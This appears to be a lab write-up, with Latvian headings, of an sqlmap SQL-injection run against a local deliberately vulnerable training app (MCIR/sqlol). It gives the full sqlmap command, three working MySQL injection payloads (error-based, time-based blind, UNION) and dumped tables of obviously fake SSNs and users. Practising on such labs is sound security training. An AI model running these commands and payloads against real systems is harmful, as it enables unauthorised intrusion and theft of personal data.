=================================================================================
0. Palaistā komanda
sqlmap -u "http://localhost/MCIR/sqlol/select.php?sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=one_row&error_level=verbose&inject_string=test&location=where_string&submit=Inject%21" -p inject_string --dump --risk=3 --level=5

1. Jautājumi, kurus uzdeva SQLMap
1.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
1.2. GET parameters 'inject_string' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
=================================================================================
sqlmap identified the following injection point(s) with a total of 1604 HTTP(s) requests:
---
Parameter: inject_string (GET)
    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=one_row&error_level=verbose&inject_string=test' AND GTID_SUBSET(CONCAT(0x716b7a7871,(SELECT (ELT(4155=4155,1))),0x7170767a71),4155)-- yQJh&location=where_string&submit=Inject!

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=one_row&error_level=verbose&inject_string=test' AND (SELECT 6592 FROM (SELECT(SLEEP(5)))DEfx)-- sCxX&location=where_string&submit=Inject!

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=one_row&error_level=verbose&inject_string=test' UNION ALL SELECT CONCAT(0x716b7a7871,0x5a557957714261565a72457448474a5457764671494945646f76505a51614752547a434d754f764c,0x7170767a71)-- -&location=where_string&submit=Inject!
---
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
Database: sqlol
Table: ssn
[5 entries]
+-------------+-----------------------+
| ssn         | name                  |
+-------------+-----------------------+
| 000-00-1112 | Wengdack Slobdegoob   |
| 012-34-5678 | Herp Derper           |
| 111-22-3333 | Peter Weiner          |
| 666-67-6776 | Chunk MacRunfast      |
| 999-99-9999 | SlapdeBack LovedeFace |
+-------------+-----------------------+

Database: sqlol
Table: users
[5 entries]
+----+---------+-----------------------+
| id | isadmin | username              |
+----+---------+-----------------------+
| 1  | 1       | Herp Derper           |
| 2  | 1       | SlapdeBack LovedeFace |
| 3  | 0       | Wengdack Slobdegoob   |
| 4  | 0       | Chunk MacRunfast      |
| 5  | 0       | Peter Weiner          |
+----+---------+-----------------------+

